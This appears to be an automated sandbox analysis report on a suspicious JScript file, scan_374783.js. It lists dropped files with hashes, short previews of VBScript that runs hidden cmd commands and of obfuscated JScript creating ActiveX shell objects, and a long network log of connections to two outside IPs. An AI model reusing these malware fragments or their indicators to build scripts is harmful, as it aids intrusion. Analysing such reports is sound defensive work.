Preview: Dim FSO, shell, xslProcessor....Sub RunCmd(CommandString, OutputFile).. cmd = "cmd /c " + CommandString + " >> " + OutputFile.. shell.Run cmd, 0, True..End Sub....Sub GetOSInfo(outputFileName).. On Error Resume Next.. strComputer = ".".. HKEY_LOCAL_MACHINE = &H80000002.... Dim objReg, outputFile.. Dim buildDetailNames, buildDetailRegValNames.... buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type").. buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType").... Set outputFile = FSO.OpenTextFile(outputFileName, 2, True).... Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_.. strComputer & "\root\default:StdRegProv").... outputFile.WriteLine("[Architecture/Processor Information]").. outputFile.WriteLine().. outputFile.Close.. cmd = "cmd /c set processor >> " & outputFileName.. shell.Run cmd, 0, True.... Set outputFile = FSO.OpenTextFile(outpu
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulL4w/l/lZ:NllUMwl/
MD5: 5E4245540CA0496B6A4E15149DB9B371
SHA1: 6F912443CDFD9F0C474E2ACC755E982C5E3CF8BB
SHA-256: 6892D98C8FEF52384104FB8712A0E1DA43C1B5CA8E7E32CF33200354E2FBC522
SHA-512: 1E61844BED5A7A30C6DE358CC6E351FFE6F783F27B5FAC2C4E71C2F9047D84C396C91E2B3264F043D03C41AAB179C7ADD3408AD68C966C1299827363DC3AF4B0
Malicious: false
Preview: @...e................................................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit): 3.6041948883713757
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 64.44%
• MP3 audio (1001/1) 32.22%
• Lumena CEL bitmap (63/63) 2.03%
• Corel Photo Paint (41/41) 1.32%
File name: scan_374783.js
File size: 3'390 bytes
MD5: c6b0c8c717d6f6b0fc0747c349821280
SHA1: e7b0686c4eebc8285ae5a2eb2c70a602b451b0d6
SHA256: 9eb68fe0683e79b88e4b37a2b038336192b516c5f975bf8636dc1565432bbdbc
SHA512: 434a2c6fe2ff42715e1ea6807e37d40852aab4ce0cac8af7ddd52327f503c72eb5544f221c15080b341942f6a79b9279679dbb04fa8216e2d5616c53df0fcac7
SSDEEP: 96:qtmSOG+5xSOG2SOGkmBWnu2B2AAfAxiEl22jlxxTOTKJGmHXMuH8L2i09dnV:L3VNlpHRHw2i8
TLSH: FB61E26157FA0248F0F39B199A3A50244A73FD997879424D045E6C4D5FF7B88CC62BB3
File Content Preview: .. . . . . . . . .v.a.r. .c.i.n.g.i.d.o.u.r.o. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).;..... . . . . . . . .v.a.r. .p.o.l.y.c.e.l.l.u.l.a.r. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".W.S.c.r.i.p
Icon Hash: 68d69b8bb6aa9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 17:09:04.708626986 CEST | 49699 | 80 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:04.713521004 CEST | 80 | 49699 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:04.713591099 CEST | 49699 | 80 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:04.713771105 CEST | 49699 | 80 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:04.718563080 CEST | 80 | 49699 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:05.292005062 CEST | 80 | 49699 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:05.293452978 CEST | 49699 | 80 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.294281960 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.294337988 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:05.294445992 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.296283007 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.296314001 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:05.299067974 CEST | 80 | 49699 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:05.299134016 CEST | 49699 | 80 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.749701023 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:05.749785900 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.754956961 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.754981995 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:05.755251884 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:05.795294046 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.823077917 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:05.867397070 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088536978 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088582993 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088619947 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088645935 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088649035 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.088665009 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088695049 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.088704109 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088740110 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088756084 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.088763952 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088792086 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088804007 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.088812113 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088841915 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088857889 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.088865042 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.088912964 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.093266010 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.093362093 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.093414068 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.093421936 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.096791983 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.096853971 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.096863031 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.096873045 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.096961975 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.096968889 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.097374916 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.097449064 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.097457886 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.097518921 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.097563028 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.097569942 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.097906113 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.097954035 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.097959995 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.098012924 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.098056078 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.098062992 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.098747969 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.098805904 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.098810911 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.098831892 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.098881006 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.098891973 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.098984957 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.099030018 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.099039078 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.099735975 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.099790096 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.099797964 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.100426912 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.100477934 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.100486040 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.100542068 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.100584984 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.100591898 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.101809025 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.101864100 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.101871967 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.102741957 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.102801085 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.102808952 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.102929115 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.102982044 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.102989912 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.103087902 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.103141069 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.103313923 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.103322029 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:07.103351116 CEST | 49700 | 443 | 192.168.2.7 | 188.114.97.3
Oct 7, 2024 17:09:07.103358030 CEST | 443 | 49700 | 188.114.97.3 | 192.168.2.7
Oct 7, 2024 17:09:14.744604111 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:14.744618893 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:14.744731903 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:14.753140926 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:14.753150940 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:15.526277065 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:15.526364088 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:15.743998051 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:15.744026899 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:15.744306087 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:15.772320032 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:15.819399118 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.002301931 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.002542973 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.002588034 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.002588987 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:16.002603054 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.002644062 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:16.002655983 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.003263950 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.003312111 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.003319025 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:16.003324986 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.003365993 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:16.003709078 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.003772974 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.003818989 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:16.003824949 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.017605066 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.017678022 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:16.017684937 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.060961008 CEST | 49709 | 443 | 192.168.2.7 | 185.199.110.133
Oct 7, 2024 17:09:16.094614029 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.094685078 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
Oct 7, 2024 17:09:16.094719887 CEST | 443 | 49709 | 185.199.110.133 | 192.168.2.7
                                                                        Oct 7, 2024 17:09:16.094733000 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.094743013 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.094785929 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.094793081 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.094801903 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.094856024 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.095448017 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.095504999 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.095556021 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.095557928 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.095566988 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.095597982 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.095608950 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.096311092 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.096347094 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.096354961 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.096359968 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.096399069 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.096402884 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.096422911 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.096462965 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.096470118 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.097104073 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.097151995 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.097158909 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.097213030 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.097251892 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.097260952 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.097265005 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.097294092 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.097974062 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.139118910 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.139128923 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182260036 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182271004 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182288885 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182298899 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182306051 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182333946 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.182349920 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182379007 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.182387114 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182404995 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.182760000 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182791948 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182804108 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182816029 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182821035 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.182836056 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.182852983 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.182873964 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.184236050 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.184257030 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.184302092 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.184308052 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.184324980 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.185193062 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.185218096 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.185255051 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.185260057 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.185285091 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.232845068 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.268392086 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.268402100 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.268441916 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.268497944 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.268521070 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.268532038 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.268563032 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.268918037 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.268932104 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.268990040 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.268996954 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.269037008 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.270036936 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.270049095 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.270103931 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.270109892 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.270148993 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.270215034 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.270229101 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.270279884 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.270284891 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.270322084 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.271452904 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.271466017 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.271528959 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.271534920 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.271575928 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.320889950 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.320915937 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.321052074 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.321062088 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.321144104 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.354713917 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.354728937 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.354825974 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.354835987 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.354893923 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.354998112 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.355010986 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.355088949 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.355094910 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.355154037 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.355546951 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.355561972 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.355617046 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.355623007 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.355679989 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:16.355812073 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:16.355827093 CEST44349709185.199.110.133192.168.2.7
